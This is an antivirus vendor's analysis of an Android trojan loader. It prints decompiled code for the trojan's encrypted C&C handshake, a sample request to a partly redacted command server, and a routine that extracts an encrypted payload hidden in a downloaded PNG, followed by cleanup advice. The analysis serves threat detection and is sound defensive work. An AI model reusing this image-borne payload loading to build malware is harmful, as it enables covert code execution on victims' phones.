My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets



Added to the Dr.Web virus database: 2018-01-17

Virus description added:


  • 582decad305a2c86b09b7024def880929b8fe6ac

A Trojan module which loads to an Android device a malicious program Android.RemoteCode.127.origin. Its code is obfuscated (encrypted). In addition, Android.RemoteCode.126.origin uses string encryption and reflection to call system classes.

Android.RemoteCode.126.origin is launched using the DexClassLoader class. Once launched, it establishes connection with the command and control (C&C) server located at http://sm.** and receives an address to download an image. Example:


This image contains an encrypted malicious module Android.RemoteCode.125.origin, which is a modification of the Trojan and performs similar functions.

screen Android.RemoteCode.127.origin #drweb

Once launched, it downloads another image from the C&C server. This image also contains an encrypted Trojan (Android.Click.221.origin).

screen Android.RemoteCode.126.origin #drweb

An example of the image obtaining process and decryption with Trojan modules

First, Android.RemoteCode.125.origin receives from the C&C server http://sm.** a public key:


Then if forms JSON (Java Script Object Notation) that looks the following way:


After this, the Trojan generates an arbitrary key in the following way:

public static String randomKey() {
StringBuilder v1 = new StringBuilder();
Random v2 = new Random();
int v0;
for(v0 = 0; v0 < 16; ++v0) {
v1.append(((char)(v2.nextInt(95) + 32)));
return v1.toString();

and it uses the key to encrypt JSON created earlier:

public static String EncryptString(String key, String data){
byte[] ret = null;
SecretKeySpec skey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
cipher.init(Cipher.ENCRYPT_MODE, skey, new IvParameterSpec(key.getBytes()));
ret = cipher.doFinal(data.getBytes());
}catch (Exception e){
return new String(Base64.encode(ret, Base64.NO_WRAP));

Then Android.RemoteCode.125.origin encrypts the generated key with a public key received from the server:

public static byte[] encryptKey(byte[] data){
String key =
byte[] keyb = Base64.decode(key, Base64.NO_WRAP);
try {
PublicKey pkey = KeyFactory.getInstance("RSA").generatePublic(new X509EncodedKeySpec(keyb));
Cipher c = Cipher.getInstance("RSA/ECB/PKCS1Padding");
c.init(1, ((Key)pkey));
data = c.doFinal(data);
} catch (Exception e) {
return null;
return data;

Then the Trojan sends to the C&C server a request which looks the following way:

POST HTTP/1.1 http://sm.**
count: 1
version: 15
Content-Type: text/html
Accept-Encoding: gzip
Accept: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Philips_S307 Build/KOT49H)
Host: sm.**
Connection: Keep-Alive
Content-Length: 256

where feature session is a generated key encrypted earlier.

As a response, Android.RemoteCode.125.origin receives an encrypted task to download images with a link to download a graphic file. Task is decrypted the same way as data infected with the Trojan were encrypted on the first server request (the generated key is applied):

"init_methods":"[\"setCacheType\",\"setDebug\", \"init\"]",
"methods":"[{\"name\":\"setCacheType\",\"class\" : [\"int\"],\"value\":[3]},{\"name\":\"setDebug\",\"class\" :
[\"boolean\"],\"value\":[false]},{\"name\":\"init\",\"class\" :
"download_url":" ", http://cdn-sm.**
"class_name":" .GW"

In the response received from the server, there is a link to download an image with the Trojan module Android.Click.221.origin http://cdn-sm.** and data for its decryption. This image looks the following way:

screen Android.RemoteCode.126.origin #drweb

Extraction of the Trojan module from the image could be performed the following way:

public static void decodePNG(String imgPath, int start, String key){
FileInputStream fis = new FileInputStream(imgPath);
FileOutputStream fos = new FileOutputStream((imgPath + ".jar"));
ByteArrayOutputStream baos = new ByteArrayOutputStream()
) {
int i = 0;
while ((i = != -1){
byte[] data = baos.toByteArray();
SecretKeySpec skey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
cipher.init(Cipher.DECRYPT_MODE, skey, new IvParameterSpec(key.getBytes()));
data = cipher.doFinal(data);
}catch (Exception e){

Values start and aesKey are used for that. These values were obtained earlier from the response message of the C&C server.

News about the Trojan

Curing recommendations


  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Dr.Web © Doctor Web
2003 — 2022

Doctor Web is a cybersecurity company focused on threat detection, prevention and response technologies